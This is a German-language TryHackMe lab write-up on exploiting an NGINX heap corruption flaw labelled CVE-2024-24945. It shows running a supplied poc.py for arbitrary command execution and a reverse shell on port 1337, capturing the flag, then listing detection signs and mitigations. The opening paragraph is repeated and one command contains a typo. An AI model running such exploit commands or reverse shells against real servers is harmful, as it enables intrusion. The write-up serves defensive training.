Dieses Labor demonstriert die Ausnutzung von CVE-2024-24945, einer Heap-Korruptionsschwachstelle, die NGINX betrifft. Das Ziel war zu verstehen, wie Speicherkorruption zu Remote-Code-Ausführung (RCE) führen kann und praktische Erfahrung in Exploitation, Erkennung und Schadensbegrenzung zu sammeln.
Dieses Labor demonstriert die Ausnutzung von CVE-2024-24945, einer Heap-Korruptions-Schwachstelle, die NGINX betrifft. Ziel war es zu verstehen, wie Speicherkorruption zu Remote Code Execution (RCE) führen kann, und praktische Erfahrungen in Exploitation, Erkennung und Abwehrtechniken zu sammeln.
. Den anfälligen NGINX-Dienst überprüfen. . Beliebige Befehle mit dem bereitgestellten Proof of Concept (PoC) ausführen. . Eine Reverse Shell auf dem Zielcontainer erhalten. . Die Herausforderungsflagge abrufen. . Erkennungs- und Abwehrstrategien verstehen.
. Plattform: TryHackMe . Zieldienst: NGINX RIFT . Containerisierte Umgebung: Docker . Exploit-Tool: poc.py . Zugriffsmethode: VNC (Virtual Network Computing)
sudo docker ps
curl -s http://127.0.0.1:19321/api/users/42
Backend in Ordnung
Führte den bereitgestellten PoC aus, um die Ausführung beliebiger Befehle zu validieren.
pytho3 poc.py --cmd 'echo hello from depthfirst > /tmp/pwned
Erfolgreiche Ausführung überprüft:
sudo docker exec nginx-rift-nginx-1
cat /tmp/pwned
Ausgabe: hello from depthfirst
Eine interaktive Shell auf dem Zielcontainer einrichten.
python3 poc.py --shell
Erfolgreiche Verbindung:
[] Warte auf Reverse-Shell auf Port 1337... [] verbunden. $
Auf die Herausforderungsflagge zugegriffen.
cat /flag.txt
THM{18_y34r_%t4t3_m15m4tch_rip5_th3_h34p}
Verteidiger können Ausnutzungsversuche identifizieren durch:
. NGINX-Worker-Abstürze . Segmentation-Fault-Ereignisse . Unerwartete ausgehende Netzwerkverbindungen . Verdächtige Shell-Prozesse (/bin/sh,bash) . Unbefugte Dateierstellung in temporären Verzeichnissen
. Aktualisierung auf eine gepatchte NGINX-Version. . Anwendung des Prinzips der minimalen Rechte . . Einschränkung unnötigen ausgehenden Netzwerkverkehrs Implementieren Sie kontinuierliches Log-Monitoring. . Verwenden Sie Container-Sicherheitskontrollen und Laufzeitüberwachung
Dieses Labor bot praktische Erfahrungen in:
. Verständnis von Heap-Korruptions-Schwachstellen. . Ausnutzung von Remote-Code-Execution-Fehlern. . Einrichtung von Reverse Shells. . Durchführung von Post-Exploitation-Validierung. . Erkennung von Kompromittierungsindikatoren und Abwehrtechniken.
Diese Übung wurde in einer kontrollierten TryHackMe-Laborumgebung durchgeführt nur für Bildungs- und defensive Cybersicherheitstrainingszwecke.
Autor: [Benedict Ejepu Amaechi] Plattform: TryHackMe Thema: CVE-2024-24945 NGINX RIFT Exploitation und Verteidigung Datum der Fertigstellung: Juni 2026